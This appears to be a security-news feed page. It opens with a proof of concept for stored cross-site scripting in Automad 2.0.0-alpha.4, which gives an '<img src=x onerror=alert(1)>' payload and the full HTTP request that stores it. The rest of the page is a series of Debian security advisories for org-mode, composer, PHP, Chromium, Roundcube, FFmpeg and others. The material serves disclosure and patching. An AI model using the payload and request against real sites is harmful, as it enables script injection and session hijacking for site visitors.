Automad version 2.0.0-alpha.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)# Date: 20-06-2024# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://automad.org# Software Link: https://github.com/marcantondahmen/automad# Category: Web Application [Flat File CMS]# Version: 2.0.0-alpha.4# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11(bullseye)# DescriptionA persistent (stored) cross-site scripting (XSS) vulnerability has beenidentified in Automad 2.0.0-alpha.4. This vulnerability enables an attackerto inject malicious JavaScript code into the template body. The injectedcode is stored within the flat file CMS and is executed in the browser ofany user visiting the forum. This can result in session hijacking, datatheft, and other malicious activities.# Proof-of-Concept*Step-1:* Login as Admin & Navigate to the endpointhttp://localhost/dashboard/home*Step-2:* There will be a default Welcome page. You will find an option toedit it.*Step-3:* Navigate to Content tab orhttp://localhost/dashboard/page?url=%2F&section=text & edit the block named***`Main`****Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>*Request:*POST /_api/page/data HTTP/1.1Host: localhostContent-Length: 1822User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvAccept: */*Origin: http://localhostReferer: http://localhost/dashboard/page?url=%2F&section=textAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie:Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cbConnection: close------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__csrf__"49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSSidentified byJerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"Youhave successfully installed Automad 2.<br><br><img src=xonerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"VisitDashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--*Response:*HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 20 Jun 2024 19:17:35 GMTContent-Type: application/json; charset=utf-8Connection: closeX-Powered-By: PHP/8.3.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 30`{"code":200,"time":1718911055}*Step-5:* XSS triggers when you go to homepage - http://localhost/

Automad 2.0.0-alpha.4 Cross Site Scripting

Debian Linux Security Advisory 5718-1 - It was discovered that Org Mode for Emacs is prone to arbitrary shell code evaluation when opening a specially crafted Org file.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5718-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 25, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : org-mode  
CVE ID         : CVE-2024-39331  
Debian Bug     : 1074136

It was discovered that Org Mode for Emacs is prone to arbitrary shell  
code evaluation when opening a specially crafted Org file.

This update includes updates pending for the upcoming point releases  
including other security fixes.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 9.4.0+dfsg-1+deb11u3.

We recommend that you upgrade your org-mode packages.

For the detailed security status of org-mode please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/org-mode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZ7HkJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Ra0w/7BHBmDTLHRfXymGImQAh7e7QnVf2jliLZQKK//LuavYD0ts7ooPO7rHtF  
h/1iEw9/VIbj1D6FYsTfD3hD63YISgy0+NbygFqviiE/QYEt4V6GvGUbR8hhb0iZ  
6fMKJcwBxfjCa8XOK/k9vK8tkrmEdF5dxGYyUOxeRGSpMoJyIFFdiQzTvtPTLVgf  
Q3kwznZjrSsFodM3Cwh8fpSf0qwJxQ5cRdll0lQ5YAJnZAs7tmOvI1gJWzr60xC+  
iJNlc2BuKJpDbWGcd4hKLttmzfm1Awgg79xRbkWH4o36+gFz7XsPWDhUg8eUnAKJ  
LYkkNB7THyVj8iOKl657eVOWwK0mpWe9v8aq1JFOkIJ9/544DZo6OqJBli1CH/vO  
xRmol8AVGogBCNTRi+eG30aVfA3EMmf20qH+BIUOmb9CYwRAxIyOOT1TBHx5UCay  
V/JuF4LxajBGcYLavQg8ajD23UssEX+JOy/COG7jgUFrbzqaGYD+fn5iCmPoNaP9  
09mP2s9xUn2E5Q9/B7JOn/bG9wpRm9lYFKUZJ0gGYZDLtOC77cf7Etc0TsSs9258  
rZotSV30e81nxmz4w2Myv06acP11S51nMfm9EUMQkeK3j16IIco9zhpIcSbrHQDr  
gmkgrO16VfoRfWN5PovELosaYPDs3/zwS3ZJjENEYNQYBd2DrKk=  
=2Z9A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5718-1

Debian Linux Security Advisory 5715-2 - The update for composer released as DSA 5715 introduced a regression in the handling of git feature branches. Updated composer packages are now available to address this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5715-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 24, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : composer

The update for composer released as DSA 5715 introduced a regression  
in the handling of git feature branches. Updated composer packages  
are now available to address this issue.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.0.9-2+deb11u4.

The stable distribution (bookworm) is not affected.

We recommend that you upgrade your composer packages.

For the detailed security status of composer please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/composer

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZ5vjkACgkQEMKTtsN8  
TjbZPhAAlCCPInB2gsJz5gYa3aOq8nFpc/MT5oACPw+eWlClzPcg4dhNA5Uyr81b  
399Vqd1u9YrxjNbFdeUEAbXSx+KsjIknl1qeCIpPCEKS9YViPL63zKGMTrG8b6Tb  
o/7Lobi5f33vCWVMm4GswCc3dSeA3pwuv/V14nhbbEi89ABrGNvlXT1MFfUpvlMb  
f4ixjnpbyHmkJQR8FI0LjNEj8pwcC6C4kBbtahfXwwDFRNKfRm/MD6KPbsAnOJdu  
UnCwmQv8WT1NiZ47oS+8Fku1CP3HI+47nF/XxRioeGf2bocksJUwQz782oHQlzRI  
MUkh73IuKYyKs9RltzH7Q38Ubw33invMDAvMAcU+w4agMuoYH8u7XbYked/2K0S6  
T1tDsWO6uh5zyzkJ0s7xR0S/KbeHiQ0eoLM+GCqVv91rxvg6KRqKD8srN8WPgPKW  
+lBb0gRubptXpAb3Ptb/zxuPaGVUm4pn3Tltwf+oD6hLHJ0J/jcwECsU4g2+HNek  
Pbp2oOC5+4SxVbbOkXzp1XFLm2e3VUfTBJZqnv4vrKckmsojQs0NtA5fax4VHEiF  
dAacKmkPngiKrjHcjSxSam1SWO/Z/jgav9pW8Kcs1hQ1xTWv8cqLgtnF9OL6Kt2r  
I2q8Ub4IQ+gjX5uee9wIgbTQhwF2sMD7uhnmmI1yITttdB3uxKQ=  
=EuWI  
-----END PGP SIGNATURE-----

Debian Security Advisory 5715-2

Debian Linux Security Advisory 5717-1 - It was discovered that user validation was incorrectly implemented for filter_var(FILTER_VALIDATE_URL) for php8.2.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5717-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 20, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : php8.2  
CVE ID         : CVE-2024-5458

It was discovered that user validation was incorrectly implemented  
for filter_var(FILTER_VALIDATE_URL).

For the stable distribution (bookworm), this problem has been fixed in  
version 8.2.20-1~deb12u1.

We recommend that you upgrade your php8.2 packages.

For the detailed security status of php8.2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/php8.2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZ0dO4ACgkQEMKTtsN8  
TjZE3w/+MqMgfCFODFOJynqDrcdQ4cycenVYZc3LhR9Als8W1OViYT/oyXGGlCIY  
iETylmEKhZfm9jUDCLKu0wdFWPkUrpbABUZMGgIW4PG4F4eBxDCaLbtqoaQgyOJ5  
wcx2f9MDtg+ST1NOpjRYUDoDaXapfSNefegUedXdapXgA3IrYFt2XnTo7su7eO5i  
2lBCguFY2errAUqsM9IDrmryYVu43BelVVsxnL+qQ3WUeIxL8tQDBXTmB1g+cQRk  
wC1dHrXWok5op0cRR8Wv9gVW0hDugLt7r+mhOMPgo3AyB1eOKdvRvrUWEveLeH1P  
Mozki0nWfjKW0V5cE/0vKFY0Oxo9WJHo8lvWnx1S2Bd3Grrxps2oRT6NRGN8nsBM  
WcViPXZwAIu2Q+1vQUAnWB48zExV3vOOMdzoUw6ROy+N4fIfXH7GjycENOPb0jYi  
Ty94WeOLQcTAcjtlBZaa5YuZjPZBdsf98n0NC+NtK61pERD8wio8OLm7RtMcGy8T  
GgUQzMXDpkhaEceUA+k1HQiqOVGgq+GxXrAdOHBkElhwZ7/Oq0660T1hV3yDleJz  
hRbMLIXDbG/jTmbpHc3faGgY8PlYE8NPaHou61e1OA8Mn2dlZEJAn1pSPgJibIz0  
MvGNx1AZPBF4TQg+qxbPzZjEO3xHoYyfQs7OOk87V5pVlSdoW1c=  
=th5l  
-----END PGP SIGNATURE-----

Debian Security Advisory 5717-1

Debian Linux Security Advisory 5716-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5716-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJune 19, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-6100 CVE-2024-6101 CVE-2024-6102 CVE-2024-6103Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 126.0.6478.114-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZzIpkACgkQZF0CR8Nudjdx6g/6Au2ftR6rzms9kC3GBwAwD7cpWWIqFPvCYTwuLidwwAma7Z8yWT19PWgHqDUUn0rA1PSHjUII9ZSDcMmvlRcYrZniqXbXQHibn1WhHJpfsInY2ddcBiQzywyTfFUXpQpQlaUEte0qry9fQ5c1Orr8YUc/w7dWThtZIXAEdjLXndvS5ToXKPqM8d6PLKgKDSF+TKhIwC8ft7vxdAW3APupwVolLiqGvkO+b6qLOURg2UHhG+oTf1RG8Klsl4dtm8e8tZPzkKWMv1KjnK4PUxOhHAMO512ZaCDlJNKWbVS/aoc96N+xWXUPOXPWeilXKgd6fsDOYSvofQ8iPwPBZjM+E92nJhXA1dpB7odkh4BRAiyV73txrb5NiOkyWMjo2MDADBhzLJq3oCSnST1V54Mgu81QCK0NdX6vPk1K3UXbFUmIB701GXi740S/ZyAdxO13F3d4SRqASLhMwIyhmHxHQImKRNH6IMeuW2fKaEyrxAvR0mUIkNrNNR/4YxFlWeOgZBvjI5HCk4lwZoHzcBbEQ0txTEkcJOe9KG0Bl36360MEW1U1W/XPNUmWzldnS+AYsnTeJqtNFB0bTKdED9CjW/0KCYIueJ/s4iI+qjVDsAYW9F9TC868gkQ5tiuuTm2Ss1cifvx8QbiGcwTVuIar5zKyZlG9gBvz0pRar6lcDt8==+zlS-----END PGP SIGNATURE-----

Debian Security Advisory 5716-1

Debian Linux Security Advisory 5715-1 - Two vulnerabilities have been discovered in Composer, a dependency manager for PHP, which could result in arbitrary command execution by operating on malicious git/hg repositories.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5715-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : composerCVE ID         : CVE-2024-35241 CVE-2024-35242Two vulnerabilities have been discovered in Composer, a dependencymanager for PHP, which could result in arbitrary command execution byoperating on malicious git/hg repositories.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.9-2+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 2.5.5-1+deb12u2.We recommend that you upgrade your composer packages.For the detailed security status of composer please refer toits security tracker page at:https://security-tracker.debian.org/tracker/composerFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZyAQwACgkQEMKTtsN8TjYxTw//by7RwssfrKcrNXWHLSJjcCJLtIUfDCzp31pxo9z1uc2viR1QYgfGgIB6yuUtjY0j8KDVBnvlpo8CTlt9Z5auzgQ0poGzshgKlvFcMwhzt7wQJtoF/mlO1dlABUcUyZvv8YLyKA4oYfRIN9bLSsldTb6gSV1bBTVLZeCggWb69HsFHrDxGmpKbcX43a+QL+qkScNu6wm7AdEG6RHDwJTJuFh72RjsONrg172i/6zL8wVqbGEg1HRYiFCCTYTniZsTi1eqQRSNzqIrq61Z/PFHhE7IS7DpNLF+8nVdTFAolou89/VTJSXO/nQCKR0MN/xHlctKY7wDj4lM3IrqNY0RoG1s4V/EiUz9fzdBitFvozPXgf45h45ETfv77NVw8quKrIQGKUNRtRBoemqHJ3J6ZpmGHyR5MRBjLdlZqnY0LtIq5dbj/AZJE48twaKbP8KsV6Yt7CtXe/c6zbqlRjZsV4p+4qOQtDuSqO751k3gWSLMtgogT4cmKLRuhhobe/zInQIsiUKcAmYiUcTjv2BXnSz2XYNfBn4Sd4/J2Bn+vMRMlLPOj7U3ZOIzZr5gWnSoJrUQEj68icbYHLG2jVGxLpZ+N3YlGEd+V+5N5sklR6Ggy5RjgPCB7at284WtvfU0EggKpgWhjoDx273K/EIVEAaEpvIUe3mhle1Tj3cdeYo==oulZ-----END PGP SIGNATURE-----

Debian Security Advisory 5715-1

CrowdStrike discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not correctly process and sanitize requests. This would allow an attacker to perform Cross-Side Scripting (XSS) attacks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5714-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : roundcubeCVE ID         : CVE-2024-37383 CVE-2024-37384Debian Bug     : 1071474Huy Nguyễn Phạm Nhật, and Valentin T. and Lutz Wolf of CrowdStrike,discovered that roundcube, a skinnable AJAX based webmail solution forIMAP servers, did not correctly process and sanitize requests. Thiswould allow an attacker to perform Cross-Side Scripting (XSS) attacks.For the oldstable distribution (bullseye), these problems have been fixedin version 1.4.15+dfsg.1-1+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 1.6.5+dfsg-1+deb12u2.We recommend that you upgrade your roundcube packages.For the detailed security status of roundcube please refer toits security tracker page at:https://security-tracker.debian.org/tracker/roundcubeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmZxxS4ACgkQEL6Jg/PVnWSmBAgAlHkpKAMLQuMJh79XHBJD38gMRshGMgxGMmbD38uZBRGhxniE8CSP3Xc2h/92qvSVcNJrjS8H0wPlkhKEV75NoNoofoDVb/Uoa1GcAShVb0pzBDzmBA1hbbdzCHfpGUnu8ghkzh1bBgX/zAwqScXcAGSn1/s4bknhPgEriRvfcAjN7o4S4lFOExSLL+RlqxWfHFNiQt6788BpgnfGZ3OWgAEWoEJdH7wr6/YdH5u/Fne6/1gD2HO3zYHVF4OzuVVkX6fTf+kHH74oGOSz7qtqW7HiriGY6+7j+7i+vSk95aWuxhPrPaGD3yVI02WjtokupJJKmgGVUf3CgNJCMEzCqg===rv9C-----END PGP SIGNATURE-----

Debian Security Advisory 5714-1

Debian Linux Security Advisory 5713-1 - A buffer overflow was discovered in libndp, a library implementing the IPv6 Neighbor Discovery Protocol (NDP), which could result in denial of service or potentially the execution of arbitrary code if malformed IPv6 router advertisements are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5713-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 16, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libndpCVE ID         : CVE-2024-5564A buffer overflow was discovered in libndp, a library implementing theIPv6 Neighbor Discovery Protocol (NDP), which could result in denial ofservice or potentially the execution of arbitrary code if malformedIPv6 router advertisements are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 1.6-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8-1+deb12u1.We recommend that you upgrade your libndp packages.For the detailed security status of libndp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libndpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZvJhIACgkQEMKTtsN8TjaFxRAAoZ0KcqyXTKSql5dnEURXQPpbzVnjYd4xnEzbunVupRTJnFmDpF/huBYl+Owh85Et0uUvEwYZIGb5bt47jStw4iBHYSG7AaWWPWmlqPT2izu461AL1njjDJh0i3BPGxTm1lY1k8tnUZkPp08BonJKnesSsogiFy51L0Apmug3/UJu9HrsUGGeVsI3oFHgxQWAe92f/9mTzst0J1BoGYC66n2CUISVUBUmyCBBKiPWbzVX5fSMu5ZAgRCCm+8VcEgFG2zZmOxaWqhlKmWNcraAsJmi4Y4Isp7AsmYFjHogY/jURDf5Y/CcdGuKwyGThk0sU67kbEgQDkCW+40OGU+WuEE+5cU5FytNZzNunsu9BZM+YqwrtRHBZhmJMr1+io9pJaX/a2wQqiHxOsb8wKbWnykDmgXRHd3qAj/XzRjzipebfr+5N7wOee8JritwniCimSSD3Uaev7HdFWO6DbhQZNH+EKpSgAZY0JlM96yIUafH6dwnH3NM/bBYP0iEbm+bXE8emF4XfkAU5TZuvPmsQgKCf8idgcHAE9a0jSv8e5bi4JNa0adLO+0B9RtuOhRGjhTtkkzwYeU1/07vGnQrZasDjZoFgHcnrXqD8hDFVYX4z8T4pn0AMe1BXLaAx83D8JOX2SqP6qiiwOGViSDyZl/JUGQ/zmUf2rEDU6fXBic==ilxi-----END PGP SIGNATURE-----

Debian Security Advisory 5713-1

Debian Linux Security Advisory 5712-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5712-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 15, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : ffmpeg  
CVE ID         : CVE-2023-50010 CVE-2023-51793 CVE-2023-51794  
                 CVE-2023-51795 CVE-2023-51798 CVE-2024-31585

Several vulnerabilities have been discovered in the FFmpeg multimedia  
framework, which could result in denial of service or potentially the  
execution of arbitrary code if malformed files/streams are processed.

For the stable distribution (bookworm), these problems have been fixed in  
version 7:5.1.5-0+deb12u1.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/ffmpeg

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZt3FoACgkQEMKTtsN8  
TjZddQ/+M8SG7jUGvMp5yfB+cMC8/ycNNpZBVObPfxJPg8XYTEXq+ayMd0uGdQO8  
AjaLh+Z7/OOJQ5ZpVHTMcE+bmCV+vAAoYyprz/uX8QstMKkiHZ2/SE/1zNrYuAMC  
JnmX8jTPNDMjFxoXYH/a2+QVmH5/Wo5GmCHStYRfIdVqkG11s76bcrVdYQ99zhek  
NfOErXzd70z6zdk6KIMHLpFHbJCDSsWlHQPPvDidaMrGyVIs6mfh6tfcBfmTTB3m  
wpsTs/Z9prDRFMZUsph4AkMncYO9vfgWwervOckVDMosfuoSMo26DvaKqDUho20s  
Ej5S4tcgzzJ+L68itXoAfMLIc7ErjX+sMNPQB7Q4HnXwKH5fXkPIhmMoOC6NUPoe  
6DQpg0rabcJajdZM2wfnvpnyLf7dzCHjjTQD4CBL6vQp9U6MNK5nme/P5EjJAcI7  
TdT3VfLsi0QCZRnX0B71meCTUzg1BXThnhUriAaLF2QIpFuJs0qMwos7GLFtGXAD  
06WY6ctpiZ8F38v4y9W3O+FXOat8BBW3kOYc/FETEYXtjt9nnCy2AuwWrJ3oKNpE  
qaOI9ikfBbLxCXSW/G9RBSId6vK5tQeeypKY1sYwHRmVOeY8v7rtgi6x7uXHBktV  
sWTXFqtF3HlA8jLpJQjemMGNvLpGaOTK331IRNkSGygtcUrGAGQ=  
=nhZN  
-----END PGP SIGNATURE-----

Debian Security Advisory 5712-1

Debian Linux Security Advisory 5711-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5711-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 15, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-5688 CVE-2024-5690 CVE-2024-5691 CVE-2024-5693   
                 CVE-2024-5696 CVE-2024-5700 CVE-2024-5702

Multiple security issues were discovered in Thunderbird, which could  
result inthe execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.12.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.12.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZto9cACgkQEMKTtsN8  
TjZXBhAAnSaDt9MYqXeJPvQm03CRoMX4NgoOoOX9Zx5lGKFHH44Ghy+ZbSc4jor6  
wEIBlrw9TpE4Cvgi6dfAtRCP9owpOl5M75FK8/YDIudPq349SJbRZRGXs0CPY5fL  
zxG5WcLPqRGT9S5wm+LQ9u2BcyOOTyDa1ICl1JQ+vPOY0r/7jjojbbkPh61a3UTq  
JGbwPYhsE4DZW6CG5OsOvzoX8/9docjO/DnTg2X6SM11Ti7IK77VJ02aT4F1dEby  
TXD5SUWws1euRgLQBY0qaOB1kbXfQJTpx6StV7aaGVfC07qQyv+PZgW9xEpbGyIF  
oGcOtTHZStQHnbQRonChBYmWjkDahmrVET73VY1gpv6nggNy9z3RcTjyWzobHBX3  
lfXJpvxtPF9/UpK2V6N5rd25F7Fq65Ldip8H/uCgJ2nL2u6qFSwrfujeaInoeDKk  
DpvkZXHJDFkim2uxjAnD1FVo88K4xa4cI8eUvN28VB1I0E+h4yHN4eIK3AgBlAiX  
+y9KoaMLVUdz29RZ/i2UngnX2K8V0P7Wqxk/SacMDiHuRt2LUt0yQQAmsSgb9CBb  
ajhbwAj/do+gsmroCz941w0O5pbmZ2Ggxqx8FiX223LwR7255IYj3qYWQd0kGXFr  
FxsZgxLryBMgBQuoDZVslO0rZ/klVZyDYS6S0C7+31lSfQAk7Og=  
=dDKM  
-----END PGP SIGNATURE-----

Tag

#debian